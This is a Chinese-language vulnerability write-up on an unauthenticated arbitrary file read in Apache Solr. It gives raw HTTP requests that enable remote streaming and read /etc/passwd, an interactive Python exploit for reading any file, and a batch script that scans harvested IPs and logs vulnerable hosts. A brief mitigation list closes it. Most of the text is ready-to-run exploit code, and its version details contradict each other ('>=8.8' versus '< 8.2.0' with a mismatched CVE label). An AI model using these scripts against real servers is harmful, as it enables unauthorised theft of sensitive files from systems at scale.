# Apache Solr 任意文件读取漏洞
# 漏洞简介
Apache Solr 存在任意文件读取漏洞,攻击者可以在未授权的情况下获取目标服务器敏感文件。
# 影响版本
全版本(>=8.8)
# 资产查找
FOFA:
# 漏洞复现
访问: /solr/admin/cores?indexInfo=false&wt=json
再发送 post 请求
/solr/
之后填写的是刚刚我们上面获取到的 status name
1 2 3 4 5 6 7 8 9 10 11 POST /solr/panda_goods/config HTTP/1.1 Host: ip:8983 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 Content-Length: 82 {"set-property" : {"requestDispatcher.requestParsers.enableRemoteStreaming":true}}
出现 "This response format is experimental. It is likely to change in the future. " 表示存在漏洞
最后可以进行文件读取了
1 2 3 4 5 6 7 8 9 10 11 12 POST /solr/panda_goods/debug/dump?param=ContentStreams HTTP/1.1 Host: ip:8983 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 Content-Length: 29 Content-Type: application/x-www-form-urlencoded stream.url=file:///etc/passwd
poc(by peiqi)
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 import requestsimport sysimport randomimport reimport base64import timefrom lxml import etreeimport jsonfrom requests.packages.urllib3.exceptions import InsecureRequestWarningdef title (): print('+------------------------------------------' ) print('+ \033[34mPOC_Des: http://wiki.peiqi.tech \033[0m' ) print('+ \033[34mGithub : https://github.com/PeiQi0 \033[0m' ) print('+ \033[34m公众号 : PeiQi文库 \033[0m' ) print('+ \033[34mVersion: Apache Solr < 8.2.0 \033[0m' ) print('+ \033[36m使用格式: python3 CVE-2019-0193.py \033[0m' ) print('+ \033[36mUrl >>> http://xxx.xxx.xxx.xxx:8983 \033[0m' ) print('+ \033[36mFile >>> 文件名称或目录 \033[0m' ) print('+------------------------------------------' ) def POC_1 (target_url ): core_url = target_url + "/solr/admin/cores?indexInfo=false&wt=json" try : response = requests.request("GET" , url=core_url, timeout=10 ) core_name = list (json.loads(response.text)["status" ])[0 ] print("\033[32m[o] 成功获得core_name,Url为:" + target_url + "/solr/" + core_name + "/config\033[0m" ) return core_name except : print("\033[31m[x] 目标Url漏洞利用失败\033[0m" ) sys.exit(0 ) def POC_2 (target_url, core_name ): vuln_url = target_url + "/solr/" + core_name + "/config" headers = { "Content-type" :"application/json" } data = '{"set-property" : {"requestDispatcher.requestParsers.enableRemoteStreaming":true}}' try : requests.packages.urllib3.disable_warnings(InsecureRequestWarning) response = requests.post(url=vuln_url, data=data, headers=headers, verify=False , timeout=5 ) print("\033[36m[o] 正在准备文件读取...... \033[0m" .format (target_url)) if "This" in response.text and response.status_code == 200 : print("\033[32m[o] 目标 {} 可能存在漏洞 \033[0m" .format (target_url)) else : print("\033[31m[x] 目标 {} 不存在漏洞\033[0m" .format (target_url)) sys.exit(0 ) except Exception as e: print("\033[31m[x] 请求失败 \033[0m" , e) def POC_3 (target_url, core_name, File_name ): vuln_url = target_url + "/solr/{}/debug/dump?param=ContentStreams" .format (core_name) headers = { "Content-Type" : "application/x-www-form-urlencoded" } data = 'stream.url=file://{}' .format (File_name) try : requests.packages.urllib3.disable_warnings(InsecureRequestWarning) response = requests.post(url=vuln_url, data=data, headers=headers, verify=False , timeout=5 ) if "No such file or directory" in response.text: print("\033[31m[x] 读取{}失败 \033[0m" .format (File_name)) else : print("\033[36m[o] 响应为:\n{} \033[0m" .format (json.loads(response.text)["streams" ][0 ]["stream" ])) except Exception as e: print("\033[31m[x] 请求失败 \033[0m" , e) if __name__ == '__main__' : title() target_url = str (input ("\033[35mPlease input Attack Url\nUrl >>> \033[0m" )) core_name = POC_1(target_url) POC_2(target_url, core_name) while True : File_name = str (input ("\033[35mFile >>> \033[0m" )) POC_3(target_url, core_name, File_name)
批量,将 url 写入 1.txt 文件,存在漏洞则自动存入 url.txt
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 import requestsimport sysimport randomimport reimport base64import timefrom lxml import etreeimport jsonfrom requests.packages.urllib3.exceptions import InsecureRequestWarninga=[] def title (): print('+------------------------------------------' ) print('+ \033[34mPOC_Des: http://wiki.peiqi.tech \033[0m' ) print('+ \033[34mGithub : https://github.com/PeiQi0 \033[0m' ) print('+ \033[34m公众号 : PeiQi文库 \033[0m' ) print('+ \033[34mVersion: Apache Solr < 8.2.0 \033[0m' ) print('+ \033[36m使用格式: python3 poc.py \033[0m' ) print('+ \033[36mUrl >>> http://xxx.xxx.xxx.xxx:8983 \033[0m' ) print('+ \033[36mFile >>> 文件名称或目录 \033[0m' ) print('+------------------------------------------' ) def POC_1 (target_url ): core_url = target_url + "/solr/admin/cores?indexInfo=false&wt=json" try : response = requests.request("GET" , url=core_url, timeout=2 ) core_name = list (json.loads(response.text)["status" ])[0 ] print("\033[32m[o] 成功获得core_name,Url为:" + target_url + "/solr/" + core_name + "/config\033[0m" ) return core_name except : print("\033[31m[x] 目标Url漏洞利用失败\033[0m" ) return 1 def POC_2 (target_url, core_name ): vuln_url = target_url + "/solr/" + core_name + "/config" headers = { "Content-type" :"application/json" } data = '{"set-property" : {"requestDispatcher.requestParsers.enableRemoteStreaming":true}}' try : requests.packages.urllib3.disable_warnings(InsecureRequestWarning) response = requests.post(url=vuln_url, data=data, headers=headers, verify=False , timeout=5 ) print("\033[36m[o] 正在准备文件读取...... \033[0m" .format (target_url)) if "This" in response.text and response.status_code == 200 : print("\033[32m[o] 目标 {} 可能存在漏洞 \033[0m" .format (target_url)) else : print("\033[31m[x] 目标 {} 不存在漏洞\033[0m" .format (target_url)) return 1 except Exception as e: print("\033[31m[x] 请求失败 \033[0m" , e) def POC_3 (target_url, core_name, File_name ): vuln_url = target_url + "/solr/{}/debug/dump?param=ContentStreams" .format (core_name) headers = { "Content-Type" : "application/x-www-form-urlencoded" } data = 'stream.url=file://{}' .format (File_name) try : requests.packages.urllib3.disable_warnings(InsecureRequestWarning) response = requests.post(url=vuln_url, data=data, headers=headers, verify=False , timeout=5 ) if "No such file or directory" in response.text: print("\033[31m[x] 读取{}失败 \033[0m" .format (File_name)) print(response.text) else : if 'root' in response.text: print(target_url) with open ('./url.txt' ,'a' ) as f: f.write(target_url+'\n' ) print("\033[36m[o] 响应为:\n{} \033[0m" .format (json.loads(response.text)["streams" ][0 ]["stream" ])) except Exception as e: print("\033[31m[x] 请求失败 \033[0m" , e) if __name__ == '__main__' : title() with open ('1.txt' , 'r' , encoding='utf-8' ) as f: g=f.read() a=re.findall('\d{1,3}[.]\d{1,3}[.]\d{1,3}[.]\d{1,3}[:]\d+' ,g) print(a) for i in a: if 'http' in i: target_url = str (i) else : target_url = 'http://' +str (i) print(target_url) core_name = POC_1(target_url) print(core_name) if str (core_name)=='1' : print(22 ) continue b=POC_2(target_url, core_name) if str (b)=='1' : continue File_name = str ('/etc/passwd' ) POC_3(target_url, core_name, File_name)
# 漏洞修复
由于目前官方不予修复该漏洞,暂无安全版本。
1 2 3 1. 开启身份验证/授权 2. 配置防火墙策略,确保Solr API(包括Admin UI)只有受信任的IP和用户才能访问 3. 禁止将Apache Solr放置在外网